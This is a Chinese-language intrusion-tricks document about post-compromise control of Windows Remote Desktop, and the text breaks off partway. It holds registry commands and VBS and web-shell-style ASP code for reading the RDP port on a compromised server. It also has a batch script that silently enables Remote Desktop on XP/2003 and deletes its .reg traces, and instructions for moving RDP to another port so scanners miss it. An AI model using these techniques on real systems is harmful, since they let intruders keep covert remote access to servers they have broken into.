入侵过程中小技巧总结.docVIP

入侵过程中小技巧总结 查看3389端口总结 一、导出注册表法 regedit /e tsport.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp 然后 type tsport.reg | find PortNumber 结果如果是d3d的话就证明是3389端口 如果是其他的 转换成10进制就可以了。 二、脚本利用法 Dim ReadComputerName Set ReadComputerName=WScript.CreateObject(WScript.Shell) Dim TSName,TSRegPath TSRegPath=HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber TSName=ReadComputerName.RegRead(TSRegPath) WScript.Echo(终端端口为TSName) WScript.Echo() WScript.Echo(本程序是帮助你找到终端的端口) WScript.Echo(http://Www.HackPixy.Comqu... WScript.Echo(Pixy) 把以上代码保存为vbs文件，如“3389port.vbs” 然后在命令行下运行cscript 3389port.vbs 即可查看终端端口（桌面环境下可直接点击查看）。 三、ASP实现法 sub get_terminal_port() terminal_port_path=HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\ terminal_port_key=PortNumber termport=wsh.regread(terminal_port_pathterminal_port_key) if termport= or err.number0 then response.write 无法得到终端服务端口。请检查权限是否已经受到限制。br else response.write 当前终端服务端口: termportbr end if end sub 四、利用工具 C3389.exe ========================================================= 开启XP And 2003终端的方法 xp、2003开终端的方法和2000、nt（ts version）不一样，不是通过安装，因为xp、2003已经自动安装的远程桌面功能，只是启动不启动的问题。 通过下面这个批处理就能在命令行下激活xp、2003的远程桌面功能 echo windows registry editor version 5.003389.reg echo [hkey_local_machine\system\currentcontrolset\control\terminal server]3389.reg echo fdenytsconnections=dword:000000003389.reg echo [hkey_local_machine\system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp]3389.reg echo portnumber=dword:00000d3d3389.reg echo [hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp]3389.reg echo portnumber=dword:00000d3d3389.reg regedit /s 3389.reg del 3389.reg ========================================================= 修改3389端口方法（修改后不易被扫出） 修改服务器端的端口设置,注册表有2个地方需要修改 [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp] PortNumber值，默认是3389，修改成所希望的端口，比如6000 第二个地方： [HKE